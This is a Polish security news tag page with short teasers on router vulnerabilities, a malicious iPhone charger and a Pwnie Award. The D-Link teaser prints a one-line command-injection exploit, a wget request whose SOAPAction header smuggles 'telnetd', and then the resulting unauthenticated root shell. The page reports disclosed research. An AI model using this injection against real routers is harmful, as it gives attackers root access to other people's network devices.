Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

Tag: hacking

Nowe D-Linki – nowy sposób na zdobycie roota bez uwierzytelnienia

11 kwietnia 2015, 12:40 | W biegu | 1 komentarz

Niedawno pisaliśmy o nowych D-Linkach, a teraz pojawiło się ciekawe badanie pokazujące w jaki sposób zrealizować nieuwierzytelniony dostęp na root-a. Wystarczy jeden prosty request HTTP… wget –header=’SOAPAction: „http://purenetworks.com/HNAP1/GetDeviceSettings/`telnetd`”’ http://192.168.0.1/HNAP1 $ telnet 192.168.0.1 Trying 192.168.0.1… Connected to 192.168.0.1. Escape character is '^]’. BusyBox v1.14.1 (2015-02-11 17:15:51 CST) built-in shell (msh) Enter…

Czytaj dalej »

EE BrightBox router – kilka ciekawych luk

17 stycznia 2014, 12:06 | W biegu | 0 komentarzy

Ostatnio zapanowała pewna moda na hackowanie urządzeń sieciowych ;) Tym razem osobom zainteresowanym tematem polecam dość rozbudowaną analizę bezpieczeństwa urządzenia BrightBox dostarczanego przez jednego z ISP w Wielkiej Brytanii. Mamy tutaj zestaw rozmaitych podatności takich jak: dostęp do istotnych danych bez uwierzytelnienia (hasła dostępowe, klucze WPS, …), przesyłanie haseł w…

Czytaj dalej »

Podstawiona ładowarka infekująca Twój telefon

06 sierpnia 2013, 09:59 | W biegu | 1 komentarz

Na ostatniej edycji konferencji Blackhat USA, pokazano na żywo ładowarkę do iPhone-a, która po podłączeniu telefonu, automatycznie instalowała na nim aplikację (czytaj: backdoor). Dalsze możliwości atakującego były już niemal nieograniczone – jako przykład zaprezentowano zadzwonienie przez zainfekowany telefon na wybrany numer. Co ciekawe, atak działa na standardowym systemie iOS (bez…

Czytaj dalej »

Polacy laureatami Pwnie Awards 2013

01 sierpnia 2013, 17:29 | W biegu | 1 komentarz

j00ru i Gynvael zostali laureatami Pwnie Awards 2013! Wspólne dzieło Polaków zatytułowane Identifying and Exploiting Windows Kernel Race Conditions via Memory Access Patterns przyniosło im zwycięstwo w kategorii „Najbardziej innowacyjna praca naukowa”.

Czytaj dalej »